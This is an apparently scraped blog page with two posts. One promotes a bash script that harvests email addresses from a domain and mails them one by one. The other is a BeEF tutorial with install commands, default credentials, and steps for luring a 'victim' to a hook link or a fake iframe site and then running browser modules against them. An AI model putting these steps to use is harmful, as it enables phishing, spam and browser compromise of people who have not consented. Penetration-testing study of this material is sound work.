alt="extract-email" border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU8R_cE3xHS7bAa_nlHAYP7rq_NtOdI0aZktcGs8UtE9NUaeJi88cJKrCPS6xEhga4GIM6mx3rNFsI6vs8WR7O4zyRaEI4UaDrBetMuY7nyQ-3xdQbblbfYRG0qMfCKeivdfJli_yodmnq/s400/Screenshot-1.jpeg" title="extract-email-1" width="400" /></a></div><br /><a name='more'></a><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMGIGvgZRPkmMpZKkeC8kK4CSVi6BCsNIGvhctm8rKsGPRk9jvvTGSfAq0h5uZRgsUYDLL2eZ7MQ47kjNl3rV5bjSBf3n4vGiGI36Iimh2V2s3-ftFLtp_NAZ3ME67vLQ61MHsmLJvdoXm/s1600/e.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="extract-email" border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMGIGvgZRPkmMpZKkeC8kK4CSVi6BCsNIGvhctm8rKsGPRk9jvvTGSfAq0h5uZRgsUYDLL2eZ7MQ47kjNl3rV5bjSBf3n4vGiGI36Iimh2V2s3-ftFLtp_NAZ3ME67vLQ61MHsmLJvdoXm/s400/e.jpeg" title="extract-email-2" width="392" /></a></div><br /><br />(2)Second mode is automatic ;you have to just supply Domain name ; script crawl domain & create sitemap for you & then extract email address from website.This mode is very slow compare to first.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNW8DivHU-Q0GQ881hXhj2fCnk-9V0BDXf4jqthrQCd5K6rhTMc62folujz3qFkjcg9AQa3q6nicbX-KZw5jMg9aKainTLvi0tzhYmoUfMhNeNjdXFq_6kajWbRPu38bNXYQW-kadzVENX/s1600/Screenshot.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="extract-email" border="0" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNW8DivHU-Q0GQ881hXhj2fCnk-9V0BDXf4jqthrQCd5K6rhTMc62folujz3qFkjcg9AQa3q6nicbX-KZw5jMg9aKainTLvi0tzhYmoUfMhNeNjdXFq_6kajWbRPu38bNXYQW-kadzVENX/s320/Screenshot.jpg" title="extract-email-3" width="320" /></a></div>If you want to download script & want to use it .Go to following <a href="http://pentesterscript.wordpress.com/2013/08/03/bash-script-to-extract-email-address-from-domain/" target="_blank">link</a> .<br /><br /><a href="http://pentesterscript.wordpress.com/2013/08/03/bash-script-to-extract-email-address-from-domain/">Penetration Tester `s Script | Bash script to extract email address from domain</a>  <br /><br />It`s bash script ; if you will write script in python ; you can enhanced crawling process.I also add other simple script  with help of it you can send email to extracted address one by one.</div>

Extract email address from given domain.

Yesterday i created simple script which extract email address from given Domain. We can gather email address from whois info; pgp key search...

+ Read more »

How to use Browser Exploitation Framework?

<div dir="ltr" style="text-align: left;" trbidi="on">The Browser Exploitation Framework (BeEF) is a penetration testing tool written in Ruby and designed to both showcase browser weaknesses as well as perform attacks both on and through the web browser. BeEF consists of a server application that manages the connected clients, known as “zombies”, and JavaScript “hooks” which run in the browser of target hosts.<br /><br />Traditionally, the JavaScript hook is injected by the attacker into HTML code either through an attack such as Cross Site Scripting (XSS) or SQL Injection. Once the hook is processed by the browser, it beacons back home to the BeEF server, and will process JavaScript based commands sent from the BeEF server to the client.<br /><br />The commands sent to the browser are triggered through modules running within the BeEF server. These modules send commands that do everything from fingerprinting browsers and plug-ins to allowing the attacker to proxy web traffic through the browser. Additional modules exist to perform tasks such as network scanning, browser keystroke logging, and cross protocol exploitation where HTTP requests can be sent to non-HTTP services with exploit payloads that will execute and return shells back to an attacker.<br /><br />In backtrack Beef  has been installed.But it`s not latest version , so you have to clone git repository for latest installation.<br /><br />git clone https://github.com/beefproject/beef.git<br /><br />cd beef<br /><br />gem install bundler<br /><br />bundle install<br /><br />./beef<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3HgVv1wAjfmrigwP2sD2lGdj1y-_8_L8NcxnE9iTUDNaF3XsZn2QZWT3d-Gfm28UtCzeVauduNiv3H13HtiMwgFz4PN0U0fj-93ydcGW5CISYOPw8RrtA0HeJ_AbguLxzXSlPOvr9Y3oN/s1600/beef.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="beef" border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3HgVv1wAjfmrigwP2sD2lGdj1y-_8_L8NcxnE9iTUDNaF3XsZn2QZWT3d-Gfm28UtCzeVauduNiv3H13HtiMwgFz4PN0U0fj-93ydcGW5CISYOPw8RrtA0HeJ_AbguLxzXSlPOvr9Y3oN/s400/beef.jpeg" title="beef-1" width="400" /></a></div><br /><a name='more'></a><br />Open user interface URL in brwoser & enter username & password which is beef. On the right side you can see getting started text & log.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3ihSp_dU1kXOiXwem4y1MnB9kwvhTWi5JdeW7YDrEIf_DRdyPMmkeyWFxLHqxKUr8QQohyphenhyphen9Eub8PXnKcR4qhat5KWo4Nkq8gdku561smnAyJrwCyLPYzKO2y-siU3Dm71Ys0SD2U46d5m/s1600/beef2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="beef" border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3ihSp_dU1kXOiXwem4y1MnB9kwvhTWi5JdeW7YDrEIf_DRdyPMmkeyWFxLHqxKUr8QQohyphenhyphen9Eub8PXnKcR4qhat5KWo4Nkq8gdku561smnAyJrwCyLPYzKO2y-siU3Dm71Ys0SD2U46d5m/s400/beef2.jpeg" title="beef-2" width="400" /></a></div><br />Now what you have to do is just send link http://your I.P:3000/demos/butcher/index.html or http://your I.p.:3000/demos/basic.html to victim<br /><br />You can also put it in iframe and make some fake website & send link of fake website to victim like Metasploit Browser Exploitation method.<br /><br />As soon as victim click on your link ; you can see victim I.P. on online browser in left side of panel.<br /><br />Now click on I.P. & then command tab on righ side . There is list of command which you can execute on victim browser as long as he has open our link in his browser.<br /><br />Here you can see three section module tree ; result history & details about module .<br /><br />Select module & click on execute button & then view command result in module history.<br /><br />There is lots of module available ; you can test it one by one & find some intresting info about victim.But our main requirement is victim should keep open our link. </div>

How to use Browser Exploitation Framework?

The Browser Exploitation Framework (BeEF) is a penetration testing tool written in Ruby and designed to both showcase browser weaknesses as ...

+ Read more »